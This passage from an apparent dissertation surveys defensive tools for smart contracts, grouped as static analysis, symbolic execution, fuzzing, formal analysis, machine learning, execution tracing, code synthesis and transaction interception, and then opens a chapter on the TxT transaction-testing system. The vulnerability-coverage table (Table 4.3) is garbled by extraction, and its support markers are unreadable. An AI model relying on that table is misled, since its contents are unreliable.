contracts (e.g., Polygon [34], RSK [35]).
4.4.4: Data Mapping
Next, we explore the design-specified inputs and outputs of each of the threat mitigation solu-
tions. Most smart contract threat mitigation solutions assume a smart contract as an input, either
as bytecode, source code, or as part of the chain data. Oyente [200], Mythril [215], Vandal [76],
ZEUS [168], teEther [178], and Osiris [269] are solutions that take bytecode as a smart contract in-
put. Hydra [74], S-GRAM [194], SmartCheck [267], VerX [230], VeriSmart [261], and SeRIF [83]
are solutions that assume source code as the input. Sereum [240], ECFChecker [137], Token-
Scope [96], EasyFlow [127], TxSpector [299], and EthScope [289] are the threat mitigation so-
lutions that read smart contract information from the chain data, i.e., stored copy of the blockchain.
      Some threat mitigation solutions use a combination of bytecode and source code as an input,
e.g., Securify37 [271], SAFEVM [48], Gastap [49], SafePay [188], and CPN [109]. Other solu-
tions, in addition to a smart contract, also take a set of manual specifications as an input, as we
   37
      Source code is optional in Securify.
                                                  92


see it in FSolidM [205], Model-Checking [217], VeriSolid [206], solc-verify [141], BitML [58],
SmartPulse [263], ESCORT [199], and ContractLarva [112]. Moreover, a smart contract is not
always used as an input of a threat mitigation solution. For instance, Flint [249], Solar [116], EVM-
Fuzzer [126], Findel [66], and the solution by Kongmanee et al. [177] assume a set of specifications
as the only input.
    Most threat mitigation solutions produce human-readable report as an output, e.g., Oyente [200],
Mythril [215], Maian [223], Manticore [214], ZEUS [168], and Sereum [240]. However, some
solutions produce machine-readable metadata (e.g., a formal model) in lieu of a human-readable
report, which can be observed in Erays [310], the solution by Grishchenko et al. [136], the solution
by Momeni et al. [212], KSolidity [165], and the solution by Kongmanee et al. [177].
    Table 4.2 shows that the majority of the threat mitigation solutions (82.7%) produce a human-
readable report as an output, and for 78.19% of the solutions, the security report is the only output.
Notably, only 4 (3.0%) of all the threat mitigation solutions result in an action (e.g., stopping a
malicious transaction), which is indicative of the predominance of the static methodology in the
smart contract defense, which is further discussed in Section 4.7.1.
    One important property of data mapping is that it often provides fine-tuned information that can-
not be inferred from the workflow of the corresponding core method. For example, the workflows
of smart contract threat mitigation solutions often specify “smart contract” as one of the inputs.
However, a smart contract can have several representations: source code, bytecode, deployed ad-
dress, etc. In this work, we extract the specific meaning of the “smart contract” and represent it
accordingly in the data mapping.
4.4.5: Threat Model
Finally, we describe all the threat mitigation solutions through the general description of their as-
sumed threat models. In other words, the threat model specifies the source of the threat, identifies
the victim(s), and defines the intent. We generalize all the threat models by subdividing them into
three major groups: victim contract, malicious contract, and hybrid malicious or victim contract.
                                                  93


Sereum [240], teEther [178], Hydra [74], Osiris [269], SODA [94], ÆGIS [117], EVMPatch [241],
SeRIF [83], and OpenZeppelin Contracts [33] are threat mitigation solutions with the vulnerable
contract threat model. Solutions with malicious contract threat models are the Ethereum honeypot
detector HoneyBadger [270], GASPER [95], and the social engineering attack detector by Ivanov et
al. [158]. Most threat mitigation solutions, however, are threat vector agnostic, i.e., they are capable
of defending against malicious smart contracts, as well as protecting vulnerable contracts. Secu-
rify [271], Oyente [200], ZEUS [168], SmartCheck [267], SmartPulse [263], SmarTest [260], and
MythX [31] are solutions with a bidirectional vector (malicious or victim contract) threat model.
     Fig. 4.3d shows the breakdown of different threat models among the threat mitigation methods.
We find that 41 (30.8%) methods assume vulnerable contracts, 7 (5.3%) imply the malicious con-
tract model, and 85 (63.9%) assume both these vectors. As we can see, the pure malicious smart
contract threat model is underrepresented among the threat mitigation solutions, which suggests that
attacks on smart contracts are generally perceived as more important than the cases of malicious
contracts attacking users. This finding is corroborated by the study by Zhou et al. [309], which
confirms that the popularity of the honeypot vulnerability, associated with the malicious smart con-
tract modality, is fourth after call injection, call-after-destruct, and airdrop-hunting vulnerabilities,
which all assume the victim smart contract threat model.
4.5: Design Workflows of Threat Mitigation Methods
In this section, we scrutinize the designs of the threat mitigation solutions by synthesizing the
uniform workflows for all the eight core methods, i.e., static analysis (Section 4.5.1), symbolic
execution (Section 4.5.2), fuzzing (Section 4.5.3), formal analysis (Section 4.5.4), machine learning
(Section 4.5.5), execution tracing (Section 4.5.6), code synthesis (Section 4.5.7), and transaction
interception (Section 4.5.8). Figs. 4.4—4.11 depict the workflows of the eight core methods. Each
of these eight workflows utilizes a set of uniform elements: modules, data entities, flows (arrows),
and environments. This set of elements allows us to concisely summarize and demystify the wide
variety of implementations of smart contract threat mitigation solutions using the aforementioned
                                                    94


set of uniform conventions.
    The modules (green rectangles) represent items that do something, i.e., algorithms, data filters,
etc. Modules can be mandatory, i.e., pertaining to any solution with the given core method (solid
borders) or optional/augmenting, i.e., implemented by some solutions employing the given core
method (dashed borders). The data entities (blue rectangles) represent pieces of data or abstract
data structures. The flows, depicted as arrows, show data or execution transitions. Environments
(red rectangles) allow grouping of certain elements into single logical modules.
Lessons Learned: By manually examining the workflows of all the 133 threat mitigation solutions,
we learned that every component exhibits a certain degree of generalization. For example, an
element called “smart contract” is a more general form of what could also be denoted as “source
code” or “bytecode”. Thus, one of the challenges we face when synthesizing the workflows is to
equate the generalizations of similar workflow elements.
4.5.1: Static Analysis Workflow
The static analysis methods apply automated data filtering and syntax analysis techniques to the
input. Static analysis methods detect vulnerabilities by extracting information (facts) from the
source code or bytecode of a smart contract. Fig. 4.4 shows the general workflow of static analysis
methods.
    The static analysis methods take bytecode (e.g., Erays [310], Vandal [76], MadMax [133]) or
source code (e.g., S-GRAM [194], SmartCheck [267], Slither [114]) of a smart contract as an input,
while some solutions also analyze previously executed transactions gathered from the chain data
(e.g., EasyFlow [127], Zhou et al. [309]). A large part of the static analysis process is devoted to
constructing a model in the form of one or a set of abstract data structures (ADS) that constitute
a suitable (and efficient) input for the static analyzer. Control flow graph (CFG) is a popular type
of such an ADS, which is utilized by Securify [271], Erays [310], and Vandal [76], to name a few.
The built model, data (in the form of some intermediate representation, e.g., a graph), and a set of
pre-defined or user-specified specifications are then directed to the static analyzer, which produces
                                                   95


a human-readable security assessment report.
                     Figure 4.4: Workflow of the static analysis core method.
4.5.2: Symbolic Execution Workflow
Symbolic execution methods [174] simulate the execution of a smart contract in a way that the
actual inputs are replaced with special traceable symbolic parameters. Fig. 4.5 depicts the gen-
eral workflow of symbolic execution methodology. These methods use smart contract bytecode
and a set of specifications as an input. In some cases, the specifications are part of the tool (e.g.,
Oyente [200], Mythril [215], teEther [178], Osiris [269]), in other cases, the specifications are ex-
pected to be provided by the user (e.g., Maian [223]). Symbolic execution methods execute smart
contracts with traceable (symbolic) parameters in lieu of actual inputs, which allows to prove or
disprove some presumptions about smart contracts. Specifically, symbolic execution can answer
questions about the possibility of execution of a certain block of code (reachability), the ability to
invoke a certain execution path, or the ability to satisfy certain constraints. Similar to static anal-
ysis, symbolic execution often involves building a search-efficient data structure, such as CFG, as
well as extracting facts and features from the input. However, unlike static analysis, the symbolic
execution methods run the code instead of analyzing its syntax. All the existing symbolic execution
solutions surveyed in this work employ the Z3 [43] SMT solver.
    Some symbolic execution solutions use certain augmentations to the basic design by adding
additional features. Oyente [200], teEther [178], SafePay [188], and Artemis [274] process the
smart contract to build a CFG. Another augmentation observed in symbolic execution solutions is
                                                 96


the production of exploits (sample inputs revealing vulnerabilities), as can be seen in teEther [178]
and EthBMC [122]. Moreover, some symbolic execution methods perform a preliminary analysis
(preprocessing) for generating guidance data facilitating the symbolic execution. SmarTest [260]
guides symbolic execution with a language-based model in order to achieve higher accuracy and
reduce the rate of timeouts.
                   Figure 4.5: Workflow of the symbolic execution core method.
4.5.3: Fuzzing Workflow
Fuzzing methods use various techniques for generating subsets of test inputs that could reveal
vulnerable execution paths in smart contracts. Fig. 4.6 shows how the fuzzing core method works in
smart contracts. Fuzzing tools perform iterative testing of a smart contract by generating test cases
and adjusting these cases via a feedback loop. The execution of smart contracts is performed by
the fuzzing engine, which is either a stand-alone code interpreter or an instrumented (i.e., modified
with a custom code) blockchain virtual machine. Fuzzing techniques allow to address the two
notorious problems associated with software testing — input ranges and path explosion. Even a
single parameter of a smart contract function might exhibit a virtually endless range of actual values,
e.g., the 256-bit integer in Ethereum; so the goal of a fuzzing method is to pick input samples
that are likely to reveal vulnerabilities. The path explosion problem occurs when the user needs
to call a sequence of transactions. Even if the exact arguments are known in advance (which is
not always the case), the number of possible orders of transactions and other variable scenarios
“explodes” as the number of transactions in the sequence increases, which necessitates the use of
special techniques, such as pruning, by the fuzzing threat mitigation methods.
    Similar to symbolic execution, some fuzzing methods also utilize guidance data for facilitating
test case generation. Confuzzius [119] performs a preprocessing in the form of taint analysis in
                                                 97


order to guide the fuzzing engine. Also, in addition to identifying a problem in a smart contract, it
is common for a fuzzing solution to deliver proof of a vulnerability in the form of a sample malicious
transaction or a series thereof, as we see in ReGuard [193], SoliAudit [189], and EthPloit [303].
                          Figure 4.6: Workflow of the fuzzing core method.
4.5.4: Formal Analysis Workflow
Formal analysis methods convert smart contracts into formal representations and use automated
provers for deriving deterministic conclusions about the security properties of these smart con-
tracts. Fig. 4.7 depicts the workflow of the smart contract formal analysis core method. One impor-
tant component of a formal analysis solution is the fact extractor, which converts a smart contract
into a formal representation, usually in a form of a domain-specific language (DSL). The formal
representation is then delivered to an automated prover, such as Tamarin [208], along with some
specifications representing vulnerabilities or security properties. The prover then juxtaposes the
extracted facts with the provided properties to deliver a set of conclusions, which include compli-
ance and violation statements. The output of a formal analysis solution may be supplemented with
additional outputs. Specifically, some formal analysis solutions include the intermediate results
in the report, e.g., extracted semantics, as seen in KEVM [148]. Also, some solutions not only
prove existing theorems, but they also produce theorems based on certain specifications, such as
theorems, as we can see in Lolisa [294].
                                                 98


                     Figure 4.7: Workflow of the formal analysis core method.
4.5.5: Machine Learning Workflow
Machine learning methods extract features from smart contracts or smart contract transactions and
train models for classifying smart contracts based on the types of vulnerabilities discovered in
them. Fig. 4.8 shows the general workflow of smart contract machine learning-based threat mit-
igation solutions. We discover that all the existing machine learning methods of smart contract
threat mitigation use supervised models, requiring a subset of labeled smart contract samples. The
workflow of a machine learning approach requires the data preprocessing (preparation) step, which
includes building a “clean” (uniform) dataset, creating training and testing samples, and performing
manual labeling (or using an existing one). The primary goal of the training step is to determine
the parameters of a chosen model. The goal of the testing step is to verify the robustness of the
model candidate. Once the model is trained and properly tested (e.g., using a K-fold method, as
observed in the evaluation part of SafelyAdministrated [156]), the model can detect vulnerabilities
or confirm the safety of the unlabeled contracts or smart contract transactions.
    Feature extraction and model building are two major characteristics that describe machine learn-
ing threat mitigation solutions. Momeni et al. [212] deliver an ML model for detecting vulnerability
patterns in smart contracts, using an abstract syntax tree (AST) and control flow graph (CFG) for
feature extraction. ContractWard [281] approaches an ML-based detection of vulnerabilities in
smart contracts based on bigram features. ESCORT [199] is a machine learning smart contract
threat mitigation solution based on a deep neural network (DNN) with a semantic-based feature
extractor. AMEVulDetector [197] builds a semantic graph from the source code and applies deep
learning to building the vulnerability detection model.
                                                 99


                      Figure 4.8: Workflow of the machine learning core method.
4.5.6: Execution Tracing Workflow
Execution tracing methods assess the security properties of smart contracts by exploring the execu-
tion of transactions sent to a given smart contract or an externally owned account (in cases when
the Ethereum platform is targeted38 ). Fig. 4.9 depicts the workflow of execution tracing methods.
These solutions use transactions as their input. After that, the transactions are filtered to keep only
the ones associated with a specific account, specific smart contract, or a concrete action (e.g., at-
tack). Next, the filtered transactions are executed by the instrumented blockchain virtual machine
(e.g., EVM). The instrumented code passively observes the execution of the given transactions
and produces a special data structure called execution traces. Formally, an execution trace is a
path in a control flow graph (CFG) of a smart contract that describes the execution of a specific
transaction (or a sequence of transactions). The execution traces are then analyzed to produce a
human-readable report.
      EthScope [289] is a security analysis framework that detects suspicious smart contracts in three
steps: collecting related blockchain states, replaying transactions, and reporting data for manual
introspective analysis. Perez et al. [228] propose an automated execution tracing framework for
Ethereum for detecting both vulnerabilities and actual attacks exploiting these vulnerabilities. DE-
FIER [264] is a tool for the investigation of attack instances associated with Ethereum decentral-
ized applications (DApps), which use Ethereum transaction tracing. Horus [120] is an execution
   38
      Ethereum has two types of accounts: smart contract account and externally owned account (EOA). Both EOAs
and smart contract accounts can be referenced by their 160-bit public addresses.
                                                        100


tracing framework for the detection and investigation of attacks on smart contracts that use logic-
based and graph-based analyses of Ethereum transactions. Another execution tracing solution is
E-EVM [224] that performs emulation and visualization of smart contracts.
                     Figure 4.9: Workflow of the execution tracing core method.
4.5.7: Code Synthesis Workflow
The code synthesis methods produce the source code or bytecode of a smart contract with or without
a template. The objective of code synthesis methods is to produce a smart contract resistant to spe-
cific attacks or vulnerabilities. Fig. 4.10 shows the workflow of the code synthesis core method. We
observe that some code synthesis solutions produce code from specifications only; others require
a template to apply specifications to (e.g., ContractLarva [112]). Custom source code annotations
are an example of specifications, as we can see in Cecchetti et al. [84].
    Some code synthesis solutions utilize language BNF grammars or custom code libraries (e.g.,
SafelyAdministrated [156] and OpenZeppelin Contracts [33]) to aid the process. The result of code
synthesis is a source code or a bytecode of a smart contract with specific security properties. In
addition, some threat mitigation solutions utilize the code synthesis core method to patch vulnerable
smart contracts on the bytecode level (e.g., SmartShield [305]).
4.5.8: Transaction Interception Workflow
A blockchain network is a set of peer-to-peer (P2P) nodes. In this type of workflow, we assume
that each node sustains the entire copy of the blockchain, i.e., we assume that the blockchain node
is a full node. Furthermore, each node has a transaction pool, which is a queue of transactions-
                                                   101


                     Figure 4.10: Workflow of the code synthesis core method.
candidates for addition to the blockchain. Transaction interception methods are dynamic approaches
that read submitted transactions from the transaction pool of the blockchain node and prevent the
node from including unsafe transactions in the blockchain. Fig. 4.11 shows the general workflow of
the transaction interception core method. Transaction interception methods employ the blockchain
P2P node instrumentation, which means that there is a custom code injected into the routines respon-
sible for transaction ordering or smart contract execution. All the transaction interception solutions
surveyed in this work also produce a human-readable report of their operation, which is reasonable:
deleting transactions from the pool is a deep intervention into the blockchain network protocol, so
it must leave a log of the action.
    Transaction interception solutions, although not numerous, exhibit a diverse spectrum of ap-
proaches. SODA [94] is a transaction-interception framework for EVM-compatible platforms that
allows users to develop custom apps for dynamic defense against attacks. ÆGIS [117] is another
transaction interception solution that uses a committee of voting security experts to create and ap-
prove attack patterns that steer transaction interception by instrumented nodes. Another transaction
interception solution is EVM* [203], which monitors overflows and timestamp bugs.
                 Figure 4.11: Workflow of the transaction interception core method.
                                                  102


4.6: Vulnerability Coverage
In this section, we compare threat mitigation solutions from the perspective of their ability to ad-
dress the known smart contract vulnerabilities. First, we select all the solutions that explicitly
declare the list of vulnerabilities they cover, 38 total, and translate the information about these
vulnerabilities into the model adopted by the popular SWC Registry [42]. Then we build the vul-
nerability map, presented in Table 4.3, which juxtaposes the threat mitigation methods by their
ability to address the 37 known smart contract vulnerabilities. The first column of the table has
the names of the threat mitigation solutions and corresponding references; if the names are not
available, we use the authors instead. The next 37 columns each correspond to the numbered SWC
Registry vulnerabilities. Thus, the table constitutes a compact map showing which vulnerabilities
are supported (i.e., defended against), which ones are partially supported, and which ones are not
supported at all for each of the 38 threat mitigation methods.
    The challenge of this approach lies in the fact that different threat mitigation solutions refer to
the same vulnerabilities using different names. Moreover, some solutions refer to a group of SWC
vulnerabilities as a single weakness. Rodler et al. [240] declare the coverage of three vulnerabilities,
which correspond to the single reentrancy vulnerability in the SWC Registry, viz., SWC-107 [37].
Some other solutions do the opposite: they break down a single SWC vulnerability into several fine-
grained subgroups. For instance, the SWC-100 [36] and SWC-108 [38] vulnerabilities are often
treated as a single vulnerability called the “private modifier”, as we can see in SmartCheck [267]
and in SolidityCheck [301].
    Table 4.3 unambiguously demonstrates that different vulnerabilities exhibit unequal attention
from different threat mitigation solutions. For example, 24 solutions declare defense against reen-
trancy (SWC-107 [37]), whereas none of the solutions declare defense against shadowing the state
variables (SWC-119 [39]) and RTL-override control character (SWC-130 [41]). Remarkably, we
observe that both of the vulnerabilities exhibiting close attention by the existing threat mitigation
solutions as well as the ones overlooked by these solutions are often particularly challenging to
                                                 103


pinpoint.
Lessons Learned: By studying the vulnerability coverage by smart contract threat mitigation solu-
tions, we discovered that some vulnerabilities are covered by multiple threat mitigation solutions.
In contrast, many vulnerabilities are not covered by any solutions.
4.7: Trends and Perspectives
In this section, we discuss the emerging trends in smart contract threat mitigation (Section 4.7.1,
Section 4.7.2, Section 4.7.3), the overlooked types of smart contracts (Section 4.7.4), and the ne-
cessity for data-driven studies in smart contract security (Section 4.7.5). To avoid speculations
and opinion-based statements, we only make inferences based on our survey data and other strong
evidence.
Lessons Learned: By exploring trends and perspectives associated with smart contract threat mit-
igation solutions, we discovered that there is a substantial room for future work despite the abun-
dance of existing studies.
4.7.1: Dynamic Transaction Interception
Most smart contract threat mitigation solutions use predominantly static code-based detection ap-
proaches. However, we note that the focus of the research community is shifting in three major
directions:
   1. static approaches are shifting into the dynamic paradigm;
   2. the code based methods are shifting into the transaction-based ones; and
   3. the detection methods are shifting towards verification.
Following these observations, it would be reasonable to suppose that the next generation of smart
contract threat mitigation solutions will likely continue exploring the primarily overlooked area of
vulnerability-agnostic dynamic transaction interception. We believe that there are two significant
reasons these methods are particularly promising: they are blockchain state-aware and can address
zero-day attacks.
                                                  104


              Table 4.3: Summary of the defense tools against smart contract vulnerabilities.
                                                             Vulnerability (SWC Registry Number)†
    Threat Mitigation               100
                                    101
                                    102
                                    103
                                    104
                                    105
                                    106
                                    107
                                    108
                                    109
                                    110
                                    111
                                    112
                                    113
                                    114
                                    115
                                    116
                                    117
                                    118
                                    119
                                    120
                                    121
                                    122
        Solution
                                    123
                                    124
                                    125
                                    126
                                    127
                                    128
                                    129
                                    130
                                    131
                                    132
                                    133
                                    134
                                    135
                                    136
    Oyente [200]                    #######                 #####                 #    ####################
    Securify [271]                  ####           #
                                                   G        ######                ########                 ############
    Mythril [215]                   #     ##       #        ##      #     #       #    #G
                                                                                        ###################
    Sereum [240]                    #######                 #############################
     Vandal [76]                    #####                   #######                   ##    ###############G
                                                                                                           ###
    sGuard [220]                    #     #####             #######                   #####################
     ZEUS [168]                     #     #####             ######                     #################                    ##
  ConFuzzius [119]                  #     ##       #        ##      #     #       #    #G
                                                                                        ###################
   VeriSmart [261]                  #     ###################################
   SmarTest [260]                   #     ###              ###      ############G
                                                                                ##############
     Maian [223]                    #####                  ##############################
 ECFChecker [137]                   #######                 #############################
     Osiris [269]                   #     ###################################
   FSolidM [205]                    #######                 ######                ######################
ContractFuzzer [163]                ####           ##       ####          ###          #################                    ##
   MadMax [133]                     ##########################                                                  #   #####   ##
 SmartCheck [267]                            #     ##           ####          #        ###############                  ####
   ReGuard [193]                    #######                 #############################
       ILF [146]                    ####                   #####          ###          ####################
  NPChecker [280]                   ####           ##       ######                #    ####################
   EasyFlow [127]                   #     ###################################
    Vultron [278]                   #     ##       ##       ##################                                  ##########
 SoidityCheck [301]                       ##       ###          ####          #        #    ##################
   GasFuzz [202]                          ######                #################                               #   ########
  SolAnalyzer [47]                  #     ##       ##########                          #########                #   ########
     GasTap [49]                    ##########################                                                  #   #####   ##
Momeni et al. [212]                 #     ##       ##            #####                #####################
    Harvey [291]                    ##########                      #############                          ############
     sFuzz [221]                    #     ##       ##       ####          ###          #########                ##########
    Artemis [274]                   ############                          ###          #########                ##########
    EthPloit [303]                  ####G
                                        #G###############################
   EthScope [289]                   #     #####             ############                             ################
       RA [100]                     #######                 #############################
      SeRIF [83]                    #######                 #############################
  Huang et al. [154]                #     ##       ##       ############                             ################
 DefectChecker [93]                 ####               #    #####G
                                                                 #                #    ####################
     ExGen [166]                    #     ####             #####
                                                           G              ########################
     MythX [31]                     #     ##                #       #         #        ###           ###   ##       #####   ##
                                            # — full support; G
                                                              # — partial support; # — no support.
†
    Available at https://swcregistry.io/ and https://github.com/SmartContractSecurity/SWC-registry
                                                                     105


      To demonstrate the blockchain state awareness, consider the Ethereum smart contract Foo in
Fig. 4.12a, which transfers cryptocurrency funds to a smart contract Bar (Fig. 4.12b). Bar is de-
ployed on Ethereum Mainnet39 , but not on Ropsten testnet40 . Moreover, Bar does not have any
payable functions41 , and therefore it cannot accept incoming Ether. As a result, the transfer in line
6 (Fig. 4.12a) will fail, reverting the entire transaction — but only on Mainnet, not on Ropsten.
Even if the states of all the variables of contract Foo on Ropsten are identical to their counterparts
on Mainnet, the behavior of the withdraw() function will be different. This example demonstrates
that the state of blockchain is an important factor that determines the outcome of smart contract ex-
ecution. Unlike the static ones, dynamic transaction interception methods consider the current state
of the blockchain, thereby preventing situations such as those illustrated in this example.
      A recent study by Zhou et al. [309] reveals that novel (zero-day) smart contract attacks con-
stantly appear on Ethereum. This trend creates a major challenge: how to defend against attacks
we do not yet know about? One way to address this problem is to utilize the prevention methods
that enforce security properties instead of searching for flaws, attacks, and vulnerabilities. Unfor-
tunately, the security properties in static prevention solutions are tightly associated with known
attacks and vulnerabilities. ECFChecker (STM-009) [137] is a prevention method that verifies the
“callback-free” property that ensures the safety of a smart contract from the family of reentrancy
vulnerabilities. These properties, however, might not be universal enough to protect the smart con-
tract from new vulnerabilities. One possible way to fill this gap is to verify the properties associated
with expected outcomes of smart contract functions instead of vulnerability-related properties.
4.7.2: AI-driven Security
We identify another recent salient trend in smart contract threat mitigation solutions — AI-driven
approaches involving machine learning. There are two major reasons why these approaches are
capable of making a significant contribution: they allow to embrace the expressiveness of modern
   39
      Ethereum Mainnet is the major production Ethereum network supporting the Ether cryptocurrency.
   40
      Testnets are alternative blockchain networks utilized for development and experiments. Testnets normally execute
the same protocols as production networks, but the test cryptocurrency on the testnet does not have any market value.
   41
      A payable function allows to transfer (deposit) cryptocurrency to the smart contract.
                                                           106


  1 contract Foo {                                            1 contract Bar {
  2    function deposit () public payable {}                  2     constructor () public { }
  3    function withdraw () public {                          3  }
  4      address admin =
  5      0
              xEc125A03C6F9E75BEB1A420e94d655B2f1352584
              ;
  6      payable (admin ). transfer (1000000000 wei)
              ;
  7      payable (msg. sender ). transfer ( address (
              this). balance );
  8    }
  9 }
                     (a) smart contract Foo                             (b) smart contract Bar
      Figure 4.12: A pair of smart contracts demonstrating the importance of the block state.
smart contracts, and also these approaches have been proven successful in securing other domains
of computing [25, 63].
    The expressiveness of smart contracts limits the capacity of static and formal analytical methods.
Most modern smart contracts are Turing-complete, which allows them to implement sophisticated
algorithms using high-level programming languages, such as Solidity and Rust. However, the
smart contract expressiveness is a double-edged sword, as it creates a virtually infinite number
of coding possibilities, which are very hard to embrace by static methods that predominantly rely
upon patterns. Although machine learning methods also rely upon some patterns, recent machine
learning models (e.g., deep neural network based) could explore much higher-dimensional feature
spaces than static approaches.
    In the past few years, we have been observing a growing trend of using AI and machine learning
for security purposes, such as malware detection [244]. Although the machine learning methods
for smart contract threat mitigation have not yet gained considerable popularity, the flexibility and
universality of these methods will likely play an important role in smart contract defense.
4.7.3: Human-machine Interaction in Smart Contracts
Smart contracts are often opposed to traditional user software based on the idea of replacing human-
based decisions with a deterministic algorithm. However, such a vision is overly idealistic because
                                                 107


a human is an integral part of a smart contract lifecycle. Specifically, humans write the source
code of smart contracts. Even in the case of automatically synthesized smart contracts, we still
require sufficient human intervention for developing templates and specifications. Testing a smart
contract also requires a human, even for unit tests, which are developed by a human developer too.
The security audit of a smart contract is also impossible without human judgment despite a wide
variety of auditing tools available. Finally, interaction with smart contracts is always initiated by
a user, regardless of the degree of automation. However, the impact of a human on the security of
smart contracts is not sufficiently studied.
    The study of human-machine interaction in smart contracts is limited by exploring honeypots
and revealing a potential for some social engineering attacks. Honeypots are malicious smart con-
tracts that entrap naive attackers who try to exploit a known vulnerability in a smart contract, making
honeypots a class of social engineering attacks, i.e., attacks targeting humans as the major attack
vector. HoneyBadger [270] is the automated tool that identifies such honeypots. Ivanov et al. [158]
expand the scope of social engineering attacks with two more categories: address manipulation and
homograph. However, the two efforts mentioned above do not embrace the entire complexity of
human-smart contract interaction.
    One unexplored area of human-smart contract interaction is the security implication of the grow-
ing population of smart contract users who do not have a deep knowledge of the working mechanics
of the blockchain and smart contracts. Another security-sensitive aspect of human-smart contract
interaction is the assumption that the decentralization of blockchain implies decentralized applica-
tions (i.e., smart contracts) enabled by that blockchain. Specifically, many smart contracts imple-
ment routines (e.g, the Ownable parent class in OpenZeppelin Contracts [33]) that grant excessive
power to specified accounts. This excessive power may be abused by the owner or stolen by the at-
tacker [156] with potentially detrimental consequences. These two examples show the importance
of studying human-smart contract interaction from the security perspective, and we envision many
future studies in this area.
                                                   108


4.7.4: Non-Ethereum Contracts
As it is revealed in Section 4.4, the vast majority of the existing smart contract threat mitigation
methods target the smart contracts on the Ethereum platform. However, in recent years, the world
has been experiencing major growth in the popularity of non-Ethereum smart contract platforms,
such as NEO [32], Hyperledger Fabric [53], EOS [27], and others. Our analysis of the evolution
of smart contract threat mitigation solutions clearly shows the growing attention by the research
community to the security of non-Ethereum smart contracts. One reason for such disproportional
attention to Ethereum, compared to other platforms, is that Ethereum is an open-data environment
with the second-largest market capitalization after Bitcoin, so it is both convenient and important
to study [229]. However, these choices come at the expense of overlooking other major smart
contract platforms. At the same time, our analysis shows that it is often impossible to extrapolate
the lessons learned in Ethereum to the other platforms. Many of the existing vulnerabilities and
other security issues are directly related to the design of the Ethereum platform or the syntax of
Solidity — the most popular programming language for Ethereum smart contracts. Therefore, we
expect increased attention to non-Ethereum platforms in the future development of smart contract
threat mitigation research.
4.7.5: Large-scale Measurements
Although blockchain is an open-data environment, there are multiple facts and statistics that we are
unaware of. One reason is that a large amount of blockchain-related data, such as failed transactions
and ERC20 token prices, is stored outside of the blockchain. Moreover, the growing popularity of
Decentralized Finance (DeFi) further intensified the exchange of off-chain data [29,30]. As a result,
we have seen the growing amounts of on-chain and off-chain data that have not been analyzed from
a security perspective.
    Yet, the existing security-related measurement studies [117, 228, 270, 309] of smart contracts
do not give answers to all the important questions. Specifically, we identify two areas important
for the security of smart contracts in which there is no systematic data:
                                                 109


   1. the measurement and flow of the market value of non-cryptocurrency blockchain assets (e.g.,
       ERC20 tokens);
   2. study of the purchases and sales of cryptocurrency and tokens by the crypto exchanges, min-
       ing rewards, and crypto money laundering.
Such data would be very helpful for applying weights to attacks and vulnerabilities based on the
actual value flow of the smart contract assets.
4.8: Chapter Summary
We surveyed the full spectrum of smart contract threat mitigation solutions in this work. We pre-
sented a general taxonomy for the classification of such solutions, which applies to today’s methods
and is suitable for future methods, even if new paradigms, blockchain platforms, or vulnerabilities
appear. Using this taxonomy, we classified 133 existing smart contract threat mitigation solutions.
We identified eight distinct core defense methods employed by the existing solutions and developed
synthesized workflows of these core methods. We studied the ability of the existing smart contract
threat mitigation solutions to address the known vulnerabilities. We conducted an evidence-based
evolutionary study of smart contract threat mitigation solutions to outline trends and perspectives.
To further benefit the community of smart contract security researchers, users, and developers, we
deployed an open-source, regularly updated online registry for smart contract threat mitigation at
https://nick-ivanov.github.io/stmregistry/.
                                                110


CHAPTER 5: CONTEXT-AWARE
USER-CENTERED TRANSACTION
TESTING42
5.1: Introduction
Ethereum smart contracts have been used for a wide variety of decentralized applications, such as
decentralized finance (DeFi), non-fungible tokens (NFT), alternative currencies (based on ERC-20
tokens), and data attestation. However, numerous vulnerabilities and attacks on Ethereum smart
contracts have been hampering their widespread adoption [132, 255].
      Following the common vulnerabilities and exposures (CVE) database, the smart contract weak-
ness classification and test cases (SWC) registry [42] identifies 37 classes of known smart contract
vulnerabilities (as of January 2022). To counter the security threats, different types of defense tools
have been developed, including syntactic analyzers [206,248], security scanners based on symbolic
execution [168,200], fuzzing tools [119,163], transaction analyzers [94,240], security libraries [33,
156], formal defense methods [83, 227], and various hybrid analysis approaches [117, 309]. In this
work, we scrutinize 106 existing smart contract security defense solutions, and find that each of
them only addresses very few classes of known vulnerabilities. We further discover that certain
vulnerability types have never been effectively addressed by any of the proposed defenses.
      Generally, all the existing smart contract defense methods have two design choices: 1) heuristic
versus deterministic; and 2) detection versus verification (see Table 5.1). Heuristic approaches use
the best-effort judgement applied to all cases (e.g., Confuzzius [119], sFuzz [221], Harvey [291]),
   42
      This chapter is based on previously published work by Nikolay Ivanov, Qiben Yan, and Anurag Kompalli titled
“TxT: Real-Time Transaction Encapsulation for Ethereum Smart Contracts” published at the IEEE Transactions on
Information Forensics and Security (Volume: 18). DOI: 10.1109/TIFS.2023.3234895 [161]. © 2023 IEEE. Reprinted,
with permission, from Nikolay Ivanov, Qiben Yan and Anurag Kompalli “TxT: Real-Time Transaction Encapsulation
for Ethereum Smart Contracts” (paper and IEEE titles are the same), January 2023.
                                                        111


                  Table 5.1: Different design choices of smart contract defense.
                                                       Design choices
                                    Property            Heuristic   Deterministic†   Detection   Verification†
                             Reject option             8 4 —                                     —
                             Guaranteed correctness 8 4 —                                        —
                             Confirm safety           — — 8                                      4
                             Identify vulnerabilities — — 4                                      8
                             †
                               choices made in this work (TxT)
while deterministic designs guarantee the correctness at the expense of rejecting a small number
of cases (such as KEVM [148], SeRIF [83], and eThor [248]). Detection tools identify known vul-
nerabilities (e.g., Oyente [200], Securify [271]), while verification tools aim at confirming various
safety properties (examples are VerX [230] and ZEUS [168]). The only known deterministic verifi-
cation approach is formal verification which proves the correctness of smart contracts by develop-
ing formal specifications for an automated prover [91]. Unfortunately, these specifications cover
only particular cases (e.g., reentrancy [83]). Consequently, these formal verification approaches,
despite guaranteed correctness, have very limited vulnerability coverage. To increase vulnerability
coverage, we propose a new approach for real-time deterministic verification of Ethereum transac-
tions.
    In this work, for the first time, we propose the deterministic verification of Ethereum transac-
tions using a fully-synchronized instrumented Ethereum Virtual Machine (EVM). Our verification
system relies on the user confirmation of a test transaction, as smart contract users generally have
reasonable expectations of the transaction outcomes. For example, if the users purchase some to-
kens, they would expect a balance increase of the respective token in the wallet. Unlike traditional
defense methods, our approach could cover a large scope of suspicious transactions, thereby reveal-
ing the behaviors associated with a majority of known and unknown vulnerabilities.
                                                112


TxT Transaction Testing: To make it possible to preview the result of one or several transactions,
